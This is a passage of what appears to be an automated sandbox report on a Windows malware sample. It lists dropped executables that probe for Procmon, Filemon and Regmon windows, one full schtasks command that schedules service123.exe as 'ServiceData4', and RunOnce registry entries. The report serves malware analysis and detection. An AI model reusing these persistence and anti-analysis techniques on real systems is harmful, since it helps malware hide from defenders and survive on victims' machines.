                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeWindow searched: window name: FilemonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeWindow searched: window name: RegmonclassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeWindow searched: window name: FilemonclassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeWindow searched: window name: FilemonClass
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeWindow searched: window name: RegmonClass
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeWindow searched: window name: FilemonClass
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeWindow searched: window name: Regmonclass
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeWindow searched: window name: Filemonclass
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeWindow searched: window name: Regmonclass
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeWindow searched: window name: FilemonClass
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeWindow searched: window name: RegmonClass
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeWindow searched: window name: FilemonClass
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeWindow searched: window name: Regmonclass
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeWindow searched: window name: Filemonclass
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\1017626001\ae64e67a81.exeWindow searched: window name: FilemonClass
                              Source: C:\Users\user\AppData\Local\Temp\1017626001\ae64e67a81.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\1017626001\ae64e67a81.exeWindow searched: window name: RegmonClass
                              Source: C:\Users\user\AppData\Local\Temp\1017626001\ae64e67a81.exeWindow searched: window name: FilemonClass
                              Source: C:\Users\user\AppData\Local\Temp\1017626001\ae64e67a81.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClass
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClass
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClass
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\Documents\HIDGCFBFBF.exeWindow searched: window name: FilemonClass
                              Source: C:\Users\user\Documents\HIDGCFBFBF.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\Documents\HIDGCFBFBF.exeWindow searched: window name: RegmonClass
                              Source: C:\Users\user\Documents\HIDGCFBFBF.exeWindow searched: window name: FilemonClass
                              Source: C:\Users\user\Documents\HIDGCFBFBF.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\1017629001\d689b693b2.exeWindow searched: window name: FilemonClass
                              Source: C:\Users\user\AppData\Local\Temp\1017629001\d689b693b2.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\1017629001\d689b693b2.exeWindow searched: window name: RegmonClass
                              Source: C:\Users\user\AppData\Local\Temp\1017629001\d689b693b2.exeWindow searched: window name: FilemonClass
                              Source: C:\Users\user\AppData\Local\Temp\1017629001\d689b693b2.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClass
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClass
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClass
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Uses schtasks.exe or at.exe to add and modify task schedules
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                              Source: C:\Users\user\Desktop\Tii6ue74NB.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
                              Source: C:\Users\user\Desktop\Tii6ue74NB.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
                              Source: C:\Users\user\Desktop\Tii6ue74NB.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
                              Source: C:\Users\user\Desktop\Tii6ue74NB.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\i9z22.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup1Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\i9z22.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup1Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\i9z22.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup1Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\i9z22.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup1Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\P0D95.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup2Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\P0D95.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup2Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\P0D95.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup2Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\P0D95.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup2Jump to behavior

                              Hooking and other Techniques for Hiding and Protection

                              barindex
                              Loading BitLocker PowerShell Module
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017626001\ae64e67a81.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeProcess information set: NOOPENFILEERRORBOX
